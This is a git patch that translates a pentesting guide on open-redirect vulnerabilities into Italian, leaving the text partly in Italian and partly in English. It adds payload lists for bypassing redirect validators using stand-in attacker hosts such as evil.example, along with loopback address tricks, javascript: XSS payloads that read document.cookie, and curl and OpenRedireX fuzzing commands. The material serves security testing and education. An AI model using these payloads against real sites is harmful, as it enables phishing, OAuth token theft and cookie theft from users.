From a28c926aa6e6a9437c3ec62ff811fc1d0a5bf824 Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 1 Oct 2025 15:29:00 +0000 Subject: [PATCH] Translated ['src/pentesting-web/open-redirect.md'] to it --- src/pentesting-web/open-redirect.md | 123 ++++++++++++++++++++++++++-- 1 file changed, 115 insertions(+), 8 deletions(-) diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md index 619578b89..dd5f25142 100644 --- a/src/pentesting-web/open-redirect.md +++ b/src/pentesting-web/open-redirect.md @@ -5,14 +5,25 @@ ## Open redirect -### Reindirizzamento a localhost o domini arbitrari +### Redirect to localhost or arbitrary domains +- Se l'app “allows only internal/whitelisted hosts”, prova notazioni alternative dell'host per raggiungere il loopback o le range interne tramite l'obiettivo del redirect: +- IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal) +- IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1] +- Punto finale e maiuscole/minuscole: localhost., LOCALHOST, 127.0.0.1. +- DNS wildcard che risolve al loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Questi sono utili quando sono ammessi solo “subdomains of X” ma la risoluzione dell'host punta comunque a 127.0.0.1. +- I riferimenti network-path spesso bypassano validator ingenui che antepongono uno scheme o controllano solo i prefissi: +- //attacker.tld → interpretato come scheme-relative e naviga off-site usando lo scheme corrente. +- I trucchi con userinfo scavalcano i controlli contains/startswith contro trusted hosts: +- https://trusted.tld@attacker.tld/ → il browser naviga su attacker.tld ma semplici controlli di stringa “vedono” trusted.tld. +- Confusione nel parsing della backslash tra framework/browser: +- https://trusted.tld\@attacker.tld → alcuni backend trattano “\” come un carattere di path e passano la validazione; i browser normalizzano in “/” e interpretano trusted.tld come userinfo, inviando gli utenti a attacker.tld. Questo si verifica anche nei mismatch dei parser URL tra Node/PHP. {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} -### Open Redirect a XSS +### Modern open-redirect to XSS pivots ```bash #Basic payload, javascript code is executed after "javascript:" javascript:alert(1) @@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29 /x:1/:///%01javascript:alert(document.cookie)/ ";alert(0);// ``` -## Open Redirect caricamento di file svg +
+Payload più moderni per bypass basati su URL +```text +# Scheme-relative (current scheme is reused) +//evil.example + +# Credentials (userinfo) trick +https://trusted.example@evil.example/ + +# Backslash confusion (server validates, browser normalizes) +https://trusted.example\@evil.example/ + +# Schemeless with whitespace/control chars +evil.example%00 +%09//evil.example + +# Prefix/suffix matching flaws +https://trusted.example.evil.example/ +https://evil.example/trusted.example + +# When only path is accepted, try breaking absolute URL detection +/\\evil.example +/..//evil.example +``` + +``` +
+ +## Open Redirect uploading svg files + ```html @@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg"> ``` -## Parametri di iniezione comuni + +## Common injection parameters + ``` /{payload} ?next={payload} @@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io Redirect=https://c1h2e1.github.io ReturnUrl=https://c1h2e1.github.io ``` -## Esempi di codice + +## Code examples #### .Net + ```bash response.redirect("~/mysafe-subdomain/login.aspx") ``` + #### Java + ```bash response.redirect("http://mysafedomain.com"); ``` + #### PHP + ```php ``` + +## Hunting and exploitation workflow (practical) + +- Single URL check with curl: + +```bash +curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:" +``` + +- Discover and fuzz likely parameters at scale: + +
+Click to expand + +```bash +# 1) Raccogli URL storici, conserva quelli con parametri redirect comuni +cat domains.txt \ +| gau --o urls.txt # or: waybackurls / katana / hakrawler + +# 2) Grep parametri comuni e normalizza la lista +rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \ +| sed 's/\r$//' | sort -u > candidates.txt + +# 3) Usa OpenRedireX per fuzz con il corpus di payload +cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt + +# 4) Verifica manualmente gli hits interessanti +awk '/30[1237]|Location:/I' results.txt +``` +``` +
+ +- Non dimenticare i sink lato client nelle SPA: cerca window.location/assign/replace e helper del framework che leggono query/hash e reindirizzano. + +- I framework spesso introducono insidie (footguns) quando le destinazioni di redirect sono derivate da input non affidabili (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input. + +{{#ref}} +../network-services-pentesting/pentesting-web/nextjs.md +{{#endref}} + +- Flussi OAuth/OIDC: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide: + +{{#ref}} +./oauth-to-account-takeover.md +{{#endref}} + +- Le risposte server che implementano redirect senza Location (meta refresh/JavaScript) sono comunque sfruttabili per phishing e a volte possono essere concatenate. Grep per: +```html + + +``` ## Strumenti - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer) +- OpenRedireX – fuzzer per rilevare open redirects. Esempio: +```bash +# Install +git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh -## Risorse +# Fuzz a list of candidate URLs (use FUZZ as placeholder) +cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50 +``` +## Riferimenti -- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) puoi trovare elenchi di fuzzing. +- Su https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect puoi trovare fuzzing lists. - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a) - +- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection +- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX {{#include ../banners/hacktricks-training.md}}